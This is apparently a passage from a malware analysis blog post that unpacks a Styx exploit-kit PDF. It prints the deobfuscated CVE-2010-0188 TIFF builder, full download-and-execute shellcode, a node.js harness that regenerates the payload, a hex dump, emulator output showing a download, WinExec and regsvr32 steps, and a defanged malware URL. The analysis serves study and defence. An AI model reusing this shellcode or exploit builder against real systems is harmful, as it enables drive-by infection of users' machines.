 shell = "\xE8\x00\x00\x00\x00\x5D\x83\xED\x05\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x46\x08\x8B\x7E\x20\x8B\x36\x66\x39\x4F\x18\x75\xF2\xBE\xEF\x00\x00\x00\x01\xEE\xBF\xCF\x00\x00\x00\x01\xEF\xE8\x80\x01\x00\x00\x89\xEA\x81\xC2\xEF\x00\x00\x00\x52\x68\x80\x00\x00\x00\xFF\x95\xCF\x00\x00\x00\x89\xEA\x81\xC2\xEF\x00\x00\x00\x31\xF6\x01\xC2\x8A\x9C\x35\x00\x02\x00\x00\x80\xFB\x00\x74\x06\x88\x1C\x32\x46\xEB\xEE\xC6\x04\x32\x00\x89\xEA\x81\xC2\xE2\x01\x00\x00\x52\xFF\x95\xD3\x00\x00\x00\x89\xEA\x81\xC2\xED\x01\x00\x00\x52\x50\xFF\x95\xD7\x00\x00\x00\x6A\x00\x6A\x00\x89\xEA\x81\xC2\xEF\x00\x00\x00\x52\x89\xEA\x81\xC2\x0B\x02\x00\x00\x52\x6A\x00\xFF\xD0\x6A\x05\x89\xEA\x81\xC2\xEF\x00\x00\x00\x52\xFF\x95\xDB\x00\x00\x00\x6A\x05\x89\xEA\x81\xC2\xE3\x00\x00\x00\x52\xFF\x95\xDB\x00\x00\x00\x6A\x00\xFF\x95\xDF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x72\x65\x67\x73\x76\x72\x33\x32\x20\x2D\x73\x20\x47\x65\x74\x54\x65\x6D\x70\x50\x61\x74\x68\x41\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x00\x57\x69\x6E\x45\x78\x65\x63\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00\xBB\x89\xF2\x89\xF7\x30\xC0\xAE\x75\xFD\x29\xF7\x89\xF9\x31\xC0\xBE\x3C\x00\x00\x00\x03\xB5\xB8\x01\x00\x00\x66\xAD\x03\x85\xB8\x01\x00\x00\x8B\x70\x78\x83\xC6\x1C\x03\xB5\xB8\x01\x00\x00\x8D\xBD\xBC\x01\x00\x00\xAD\x03\x85\xB8\x01\x00\x00\xAB\xAD\x03\x85\xB8\x01\x00\x00\x50\xAB\xAD\x03\x85\xB8\x01\x00\x00\xAB\x5E\x31\xDB\xAD\x56\x03\x85\xB8\x01\x00\x00\x89\xC6\x89\xD7\x51\xFC\xF3\xA6\x59\x74\x04\x5E\x43\xEB\xE9\x5E\x93\xD1\xE0\x03\x85\xC4\x01\x00\x00\x31\xF6\x96\x66\xAD\xC1\xE0\x02\x03\x85\xBC\x01\x00\x00\x89\xC6\xAD\x03\x85\xB8\x01\x00\x00\xC3\xEB\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89\x85\xB8\x01\x00\x00\x56\x57\xE8\x58\xFF\xFF\xFF\x5F\x5E\xAB\x01\xCE\x80\x3E\xBB\x74\x02\xEB\xED\xC3\x55\x52\x4C\x4D\x4F\x4E\x2E\x44\x4C\x4C\x00\x55\x52\x4C\x44\x
6F\x77\x6E\x6C\x6F\x61\x64\x54\x6F\x46\x69\x6C\x65\x41\x00\x55\x73\x65\x72\x33\x32\x2E\x65\x78\x65\x00";
 shell += url_var;
 // Pad to 1044 bytes, a multiple of three, so base64_encode needs no '='.
 while (shell.length < 1044) shell += "\x00";
 shell = base64_encode(shell);
 
    // Two tails; the first is used for viewers that get_ver() rates below 9.0.
    if(get_ver() < 9000){
        end_tiff = "o+uA\x53\x6agggkpuL4BK/////wAAA\x41BAAAAAAAAAAAA\x51AAAA\x41AA\x41BReA\x53iBW\x68\x45oPY4BKo+u\x41\x53j\x41gg\x6bqv\x57IBK\x58Vy\x41SiYAAAAA\x41AAAA\x41AAAA\x41AAABB\x51UF\x42Q\x55F\x42QQU\x58gE\x70qaVm\x4eEE2BSgUX\x67\x45p0JAS\x4e\x4dFOBS\x67UXg\x45p\x42Q\x55F\x42\x65AzzpEtT\x67U\x6f\x43F4B\x4b\x51U\x46BQT\x48\x4aZItx\x4dIt2D\x49t2\x48ItuCItGIIs2Z\x6a\x6cIGHXyi0U8i1QFeAH\x71\x693Ig\x41e4xyU\x47tAe\x69\x4cGCtYB\x49\x4875SD\x64/3XvSY\x74a\x4aAHrZosMS4taHAHrA\x79yL\x69e\x5aqBP82/9WF\x77K119YE4S\x55kqAHXtlj\x48\x4atQP\x7apQ==";
    } else {
        end_tiff = "\x6bB+A\x53j\x69\x51\x68E\x709fo\x42K/////w\x41AAA\x42AAAAA\x41\x41AAAAAQAAAAAAAA\x70WO\x41S\x69\x41Ji\x6b\x71WIYBKkB+A\x53\x6a\x43\x51hErY\x704B\x4bjauASiYAA\x41\x41AAA\x41AAAAAAAA\x41\x41ABBQUFBQUFBQaVjgEp\x71aV\x6dNM7WASqVjgEp0JAS\x4eT0uC\x53q\x56j\x67Ep4\x44POkIg6CSqJ\x6agEpB\x51U\x46\x42M\x63lki3\x45wi3YMi3Y\x63i24\x49i0YgizZm\x4fU\x67\x59dfKL\x52Ty\x4cVAV4\x41eqLciA\x427jHJ\x51\x610\x426IsYK1\x67EgfvlIN3/d\x659\x4ai1okAetmiwxLi1oc\x41es\x44LIuJ5moE/\x7ab/1YXArX\x581gThJSS\x6f\x41\x64\x652WM\x63\x6d1\x41/Ol";
    }
    // Header + filler + shellcode + filler, then the tag block and the tail.
    tiff = "SUkqADggAACQ" + grow('QUFB', 2000) + shell + grow('kJCQ', 7592);
    tiff += "kAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////"+end_tiff;
    // pgGzgu is the <imageEdit> field from the template; this assignment is
    // where the crafted TIFF reaches the viewer.
    pgGzgu.rawValue = tiff;
}
run(); // entry point; the enclosing script is bound to the field's initialize event (see the XFA stream above)



As always, more JavaScript. Let's get the new JS ready for node-js:

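/**
 * Base64-encodes a binary string (each char code is taken as one byte).
 *
 * This is the sample's encoder (it looks like the phpjs base64_encode) with
 * its padding repaired: the original ran its do/while once even for empty
 * input, and read missing trailing bytes as NaN, which the shifts turn into
 * 0 bits, so "" encoded to "AAAA" and lengths that are not a multiple of
 * three ended in 'A' instead of '='. Output is identical to the original
 * for inputs whose length is a multiple of three, which is the only case
 * run() produces (the shell buffer is padded to 1044 bytes first).
 *
 * @param {string} data binary string; char codes above 255 are truncated
 *   to their low byte (the original OR-ed the extra bits into the
 *   neighbouring byte, producing garbage)
 * @returns {string} standard base64 with '=' padding
 */
function base64_encode(data) {
    var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    var len = data.length;
    var tmp_arr = [];

    for (var i = 0; i < len; i += 3) {
        // Missing bytes of the last group are taken as 0; the output
        // characters they would produce are replaced by '=' below.
        var o1 = data.charCodeAt(i) & 0xff;
        var o2 = i + 1 < len ? data.charCodeAt(i + 1) & 0xff : 0;
        var o3 = i + 2 < len ? data.charCodeAt(i + 2) & 0xff : 0;
        var bits = o1 << 16 | o2 << 8 | o3;

        // Four 6-bit symbols per 24-bit group.
        tmp_arr.push(b64.charAt(bits >> 18 & 0x3f) +
                     b64.charAt(bits >> 12 & 0x3f) +
                     b64.charAt(bits >> 6 & 0x3f) +
                     b64.charAt(bits & 0x3f));
    }

    var enc = tmp_arr.join('');
    var rem = len % 3;
    if (rem === 1) {
        enc = enc.slice(0, -2) + '==';
    } else if (rem === 2) {
        enc = enc.slice(0, -1) + '=';
    }
    return enc;
}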

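/**
 * Turns a viewer version into the four-digit integer that run() compares
 * against 9000 (Acrobat/Reader 9.0).
 *
 * In the sample this read app.viewerVersion, which Acrobat exposes as a
 * number such as 9.3. The harness has no app object, so the value to
 * emulate is taken from the optional parameter instead. The original
 * harness hard-coded the string "9.3.0"; because only the first dot is
 * removed (as in the sample) that became "93.0" and parsed as 93, which
 * silently selected run()'s pre-9 branch rather than emulating 9.3.
 *
 * @param {number|string} [viewerVersion=9.3] value to emulate; its String
 *   form is used, so 9.3 and "9.3" are equivalent
 * @returns {number} e.g. 9300 for 9.3 and 7000 for 7. As in the sample,
 *   versions of 10 and above collapse below 9000 (10.1 -> 1010).
 */
function get_ver(viewerVersion) {
    //@malforsec changed to work: app.viewerVersion is unavailable in node
    var emulated = viewerVersion === undefined ? 9.3 : viewerVersion;
    var app_ver = emulated.toString();
    // Only the first dot is dropped, matching the sample's transformation.
    app_ver = app_ver.replace('.', '');
    while (app_ver.length < 4) {
        app_ver += '0';
    }
    return parseInt(app_ver, 10);
}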

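/**
 * Repeats body until it is at least len characters long and returns the
 * first len characters; run() uses it for the 'QUFB' and 'kJCQ' filler
 * around the encoded shellcode.
 *
 * @param {string} body pattern to repeat; must be non-empty when len > 0
 * @param {number} len length of the result; values <= body.length (or <= 0)
 *   just truncate body
 * @returns {string} exactly len characters (empty for len <= 0)
 * @throws {RangeError} if body is empty and len > 0 (the sample's doubling
 *   loop never terminates in that case)
 */
function grow(body, len) {
    if (body.length === 0 && body.length < len) {
        throw new RangeError("grow: cannot grow an empty string");
    }
    var out = body;
    // Doubling reaches len in O(log(len / body.length)) concatenations.
    while (out.length < len) {
        out += out;
    }
    return out.substring(0, len);
}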

// Assembles the crafted TIFF that layer two stored in the image field
// pgGzgu.rawValue; the post identifies the bug it targets as
// CVE-2010-0188. Everything concatenated here is base64 text: a
// little-endian TIFF header, 2000 characters of 'QUFB', the encoded
// shellcode, 7592 characters of 'kJCQ' (the 0x90 run visible in the binary
// dump below), a fixed tag block and one of two version-dependent tails.
// In the harness the result is printed instead of assigned.
function run() {
    // fGRdP comes from the outer layer (stubbed to "" at the bottom of this
    // listing); it is appended to the shellcode as a NUL-terminated string.
    var url_var = fGRdP + "&h=03\x00";
    // Shellcode as a binary string. NOTE(review): this transcription contains
    // "\xOO" (letter O) in several places, which is not a valid hexadecimal
    // escape and which current JavaScript engines reject, so the listing
    // does not parse as printed; the decoded listing above and the dump
    // below show \x00 there. The line break inside the literal is page
    // wrapping: the decoded listing has a \x0B byte at that position.
    shell = "\xE8\x00\x00\x00\x00]\x83\xED\x051\xC9d\x8Bq0\x8Bv \x8Bv\x1C\x8BF\x08\x8B~ \x8B6f9O\x18u\xF2\xBE\xEF\xOO\x00\x00\x01\xEE\xBF\xCF\x00\x00\x00\x01\xEF\xE8\x80\x01\xOO\xOO\x89\xEA\x81\xC2\xEF\x00\x00\x00Rh\x80\x00\x00\x00\xFF\x95\xCF\x00\x00\x00\x89\xEA\x81\xC2\xEF\xOO\x00\x001\xF6\x01\xC2\x8A\x9C5\x00\x02\x00\x00\x80\xFB\x00t\x06\x88\x1C2F\xEB\xEE\xC6\x042\x00\x89\xEA\x81\xC2\xE2\x01\x00\x00R\xFF\x95\xD3\x00\x00\x00\x89\xEA\x81\xC2\xED\x01\x00\x00RP\xFF\x95\xD7\x00\x00\x00j\x00j\x00\x89\xEA\x81\xC2\xEF\x00\x00\x00R\x89\xEA\x81\xC2
\x02\x00\x00Rj\x00\xFF\xD0j\xO5\x89\xEA\x81\xC2\xEF\x00\xOO\xOOR\xFF\x95\xDB\x00\x00\x00j\x05\x89\xEA\x81\xC2\xE3\xOO\xOO\x00R\xFF\x95\xDB\x00\xOO\x00j\x00\xFF\x95\xDF\x00\x00\x00\x00\x00\x00\x00\x00\x00\xOO\x00\x00\x00\x00\xOO\x00\x00\x00\x00\x00\x00\x00\x00regsvr32 -s GetTempPathA\x00LoadLibraryA\x00GetProcAddress\x00WinExec\x00ExitProcess\x00\xBB\x89\xF2\x89\xF70\xC0\xAEu\xFD)\xF7\x89\xF91\xC0\xBE<\x00\x00\x00\x03\xB5\xB8\x01\x00\x00f\xAD\x03\x85\xB8\x01\x00\x00\x8Bpx\x83\xC6\x1C\x03\xB5\xB8\x01\x00\x00\x8D\xBD\xBC\x01\x00\x00\xAD\x03\x85\xB8\x01\x00\x00\xAB\xAD\x03\x85\xB8\x01\x00\x00P\xAB\xAD\x03\x85\xB8\x01\x00\x00\xAB^1\xDB\xADV\x03\x85\xB8\x01\x00\x00\x89\xC6\x89\xD7Q\xFC\xF3\xA6Yt\x04^C\xEB\xE9^\x93\xD1\xE0\x03\x85\xC4\x01\x00\x001\xF6\x96f\xAD\xC1\xE0\x02\x03\x85\xBC\x01\x00\x00\x89\xC6\xAD\x03\x85\xB8\x01\x00\x00\xC3\xEB\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89\x85\xB8\x01\x00\x00VW\xE8X\xFF\xFF\xFF_^\xAB\x01\xCE\x80>\xBBt\x02\xEB\xED\xC3URLMON.DLL\x00URLDownloadToFileA\x00User32.exe\x00";
    shell += url_var;
    // Pad to 1044 bytes, a multiple of three, so base64_encode needs no '='
    // (the "\xOO" here is the same transcription artefact as above).
    while (shell.length < 1044) shell += "\xOO";
    shell = base64_encode(shell);

    // get_ver() < 9000 picks the first tail. With the harness value "9.3.0"
    // get_ver() returns 93 (only the first dot is removed, so "93.0" is
    // parsed), i.e. this run emulated a pre-9 viewer rather than 9.3.
    if (get_ver() < 9000) {
        end_tiff = "o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAABReASiBWhEoPY4BKo+uASjAggkqvWIBKXVyASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQQUXgEpqaVmNEE2BSgUXgEp0JASNMFOBSgUXgEpBQUFBeAzzpEtTgUoCF4BKQUFBQTHJZItxMIt2DIt2HItuCItGIIs2ZjlIGHXyi0U8i1QFeAHqi3IgAe4xyUGtAeiLGCtYBIH75SDd/3XvSYtaJAHrZosMS4taHAHrAyyLieZqBP82/9WFwK119YE4SUkqAHXtljHJtQPzpQ==";
    } else {
        end_tiff = "kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAApWOASiAJikqWIYBKkB+ASjCQhErYp4BKjauASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQaVjgEpqaVmNM7WASqVjgEp0JASNT0uCSqVjgEp4DPOkIg6CSqJjgEpBQUFBMclki3Ewi3YMi3Yci24Ii0YgizZmOUgYdfKLRTyLVAV4AeqLciAB7jHJQa0B6IsYK1gEgfvlIN3/de9Ji1okAetmiwxLi1ocAesDLIuJ5moE/zb/1YXArXX1gThJSSoAde2WMcm1A/Ol";
    }
    // Header + filler + shellcode + filler, then the tag block and the tail.
    tiff = "SUkqADggAACQ" + grow('QUFB', 2000) + shell + grow('kJCQ', 7592);
    tiff += "kAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////" + end_tiff;
    //pgGzgu.rawValue = tiff;
    console.log(tiff);
}
// The outer obfuscation layer defined fGRdP (presumably the download URL
// that run() appends to the shellcode); it was dropped during the clean-up,
// so an empty stand-in keeps run() from throwing a ReferenceError.
fGRdP = '';

// Kick off the decoded script; in the sample this ran from the field's
// initialize event.
run();


And we get this output — base64-encoded, as the script indicates:


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


And the decoded binary output:


:
^@^@^@^@]<83>í^E1Éd<8b>q0<8b>v^L<8b>v^\<8b>F^H<8b>~ <8b>6f9O^Xuò¾ï^@^@^@^Aî¿Ï^@^@^@^Aïè<80>^A^@^@<89>ê<81>Âï^@^@^@Rh<80>^@^@^@ÿ<95>Ï^@^@^@<89>ê<81>Âï^@^@^@1ö^AÂ<8a><9c>5^@^B^@^@<80>û^@t^F<88>^\2FëîÆ^D2^@<89>ê<81>Ââ^A^@^@Rÿ<95>Ó^@^@^@<89>ê<81>Âí^A^@^@RPÿ<95>×^@^@^@j^@j^@<89>ê<81>Âï^@^@^@R<89>ê<81>Â^K^B^@^@Rj^@ÿÐj^E<89>ê<81>Âï^@^@^@Rÿ<95>Û^@^@^@j^E<89>ê<81>Âã^@^@^@Rÿ<95>Û^@^@^@j^@ÿ<95>ß^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@regsvr32 -s GetTempPathA^@LoadLibraryA^@GetProcAddress^@WinExec^@ExitProcess^@»<89>ò<89>÷0À®uý)÷<89>ù1À¾<^@^@^@^Cµ¸^A^@^@f­^C<85>¸^A^@^@<8b>px<83>Æ^\^Cµ¸^A^@^@<8d>½¼^A^@^@­^C<85>¸^A^@^@«­^C<85>¸^A^@^@P«­^C<85>¸^A^@^@«^1Û­V^C<85>¸^A^@^@<89>Æ<89>×Qüó¦Yt^D^Cëé^<93>Ñà^C<85>Ä^A^@^@1ö<96>f­Áà^B^C<85>¼^A^@^@<89>Æ­^C<85>¸^A^@^@Ãë^P^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@<89><85>¸^A^@^@VWèXÿÿÿ_^«^AÎ<80>>»t^BëíÃURLMON.DLL^@URLDownloadToFileA^@User32.exe^@&h=03^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><
90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><
90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>



3. The shellcode/binary content


Let's look at a hex/ASCII representation of the file. Note that this dump appears to be of a UTF-8-encoded copy of the shellcode rather than the raw bytes: every byte above 0x7F is shown as a two-byte sequence (for example `5dc2 83c3 ad05` at offset 0x6 corresponds to the bytes `]`, 0x83, 0xED, 0x05 seen in the previous listing), so offsets here do not match those in the decoded buffer.

0000000: c3a8 0000 0000 5dc2 83c3 ad05 31c3 8964  ......].....1..d
0000010: c28b 7130 c28b 760c c28b 761c c28b 4608  ..q0..v...v...F.
0000020: c28b 7e20 c28b 3666 394f 1875 c3b2 c2be  ..~ ..6f9O.u....
0000030: c3af 0000 0001 c3ae c2bf c38f 0000 0001  ................
0000040: c3af c3a8 c280 0100 00c2 89c3 aac2 81c3  ................
0000050: 82c3 af00 0000 5268 c280 0000 00c3 bfc2  ......Rh........
0000060: 95c3 8f00 0000 c289 c3aa c281 c382 c3af  ................
0000070: 0000 0031 c3b6 01c3 82c2 8ac2 9c35 0002  ...1.........5..
0000080: 0000 c280 c3bb 0074 06c2 881c 3246 c3ab  .......t....2F..
0000090: c3ae c386 0432 00c2 89c3 aac2 81c3 82c3  .....2..........
00000a0: a201 0000 52c3 bfc2 95c3 9300 0000 c289  ....R...........
00000b0: c3aa c281 c382 c3ad 0100 0052 50c3 bfc2  ...........RP...
00000c0: 95c3 9700 0000 6a00 6a00 c289 c3aa c281  ......j.j.......
00000d0: c382 c3af 0000 0052 c289 c3aa c281 c382  .......R........
00000e0: 0b02 0000 526a 00c3 bfc3 906a 05c2 89c3  ....Rj.....j....
00000f0: aac2 81c3 82c3 af00 0000 52c3 bfc2 95c3  ..........R.....
0000100: 9b00 0000 6a05 c289 c3aa c281 c382 c3a3  ....j...........
0000110: 0000 0052 c3bf c295 c39b 0000 006a 00c3  ...R.........j..
0000120: bfc2 95c3 9f00 0000 0000 0000 0000 0000  ................
0000130: 0000 0000 0000 0000 0000 0000 7265 6773  ............regs
0000140: 7672 3332 202d 7320 4765 7454 656d 7050  vr32 -s GetTempP
0000150: 6174 6841 004c 6f61 644c 6962 7261 7279  athA.LoadLibrary
0000160: 4100 4765 7450 726f 6341 6464 7265 7373  A.GetProcAddress
0000170: 0057 696e 4578 6563 0045 7869 7450 726f  .WinExec.ExitPro
0000180: 6365 7373 00c2 bbc2 89c3 b2c2 89c3 b730  cess...........0
0000190: c380 c2ae 75c3 bd29 c3b7 c289 c3b9 31c3  ....u..)......1.
00001a0: 80c2 be3c 0000 0003 c2b5 c2b8 0100 0066  ...<...........f
00001b0: c2ad 03c2 85c2 b801 0000 c28b 7078 c283  ............px..
00001c0: c386 1c03 c2b5 c2b8 0100 00c2 8dc2 bdc2  ................
00001d0: bc01 0000 c2ad 03c2 85c2 b801 0000 c2ab  ................
00001e0: c2ad 03c2 85c2 b801 0000 50c2 abc2 ad03  ..........P.....
00001f0: c285 c2b8 0100 00c2 ab5e 31c3 9bc2 ad56  .........^1....V
0000200: 03c2 85c2 b801 0000 c289 c386 c289 c397  ................
0000210: 51c3 bcc3 b3c2 a659 7404 5e43 c3ab c3a9  Q......Yt.^C....
0000220: 5ec2 93c3 91c3 a003 c285 c384 0100 0031  ^..............1
0000230: c3b6 c296 66c2 adc3 81c3 a002 03c2 85c2  ....f...........
0000240: bc01 0000 c289 c386 c2ad 03c2 85c2 b801  ................
0000250: 0000 c383 c3ab 1000 0000 0000 0000 0000  ................
0000260: 0000 0000 0000 00c2 89c2 85c2 b801 0000  ................
0000270: 5657 c3a8 58c3 bfc3 bfc3 bf5f 5ec2 ab01  VW..X......_^...
0000280: c38e c280 3ec2 bb74 02c3 abc3 adc3 8355  ....>..t.......U
0000290: 524c 4d4f 4e2e 444c 4c00 5552 4c44 6f77  RLMON.DLL.URLDow
00002a0: 6e6c 6f61 6454 6f46 696c 6541 0055 7365  nloadToFileA.Use
00002b0: 7233 322e 6578 6500 2668 3d30 3300 0000  r32.exe.&h=03...
00002c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00002d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................



We can see what will be performed: a file download followed by regsvr32. We cannot, however, see from where the file is downloaded. That "h=03" looks strange — it does not look XORed either, but let's see:

4. Emulating execution


Let's see if we can learn more by running the code:

$sctest -Ss 1000000000 < shell.bin

Hook me Captain Cook!
userhooks.c:108 user_hook_ExitProcess
ExitProcess(0)
stepcount 34540
[emu 0x0x8469078 ^[[31;1mdebug^[[0m ] cpu state    eip=0x004170cf
[emu 0x0x8469078 ^[[31;1mdebug^[[0m ] eax=0x00000020  ecx=0x0000000c  edx=0x004170e3  ebx=0x7c805800
[emu 0x0x8469078 ^[[31;1mdebug^[[0m ] esp=0x00416fce  ebp=0x00417000  esi=0x0000000a  edi=0x004170e3
[emu 0x0x8469078 ^[[31;1mdebug^[[0m ] Flags:
DWORD GetTempPathA (
     DWORD nBufferLength = 128;
     LPTSTR lpBuffer = 0x004170ef =>
           = "c:\tmp\";
) =  7;
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x004171e2 =>
           = "URLMON.DLL";
) = 0x7df20000;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7df20000 =>
         none;
     LPCSTR lpProcName = 0x004171ed =>
           = "URLDownloadToFileA";
) = 0x7df7b0bb;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 =>
         none;
     LPCTSTR szURL = 0x0041720b =>
           = "&h=03";
     LPCTSTR szFileName = 0x004170ef =>
           = "c:\tmp\User32.exe";
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) =  0;
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x004170ef =>
           = "c:\tmp\User32.exe";
     UINT uCmdShow = 5;
) =  32;
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x004170e3 =>
           = "regsvr32 -s c:\tmp\User32.exe";
     UINT uCmdShow = 5;
) =  32;
void ExitProcess (
     UINT uExitCode = 0;
) =  0;



Nothing more. I guess the bad guys were too quick on this one and forgot to add the full URL to the malware.


5. Epilogue


If we look at the Styx URL used to serve the EXE files:


hxxp: //rupscare.org/zNUdi611VKX0IDkq01jcK0dBBK0Q58F0rlJQ0HCzj0CaX90rFSv0076B01qoF05Oka0sF6F0xPVY16jTn17bNp0odl10d0TL0629S0F84i0FHxP0wT6105b9D0FEWS0Kr4U0swQx0ZdqR0Dw0B0wCUu0ZkH50rXuR0Uc7v0skdD0MhrU15SwC0iNDa0iOGF0HCX113Tui/xMCOakDS1p.exe?gO=aTtOki&h=11

we can see that the "&h=03" fits into the picture, and the assumption above holds.


Happy Styx PDF peeling :)
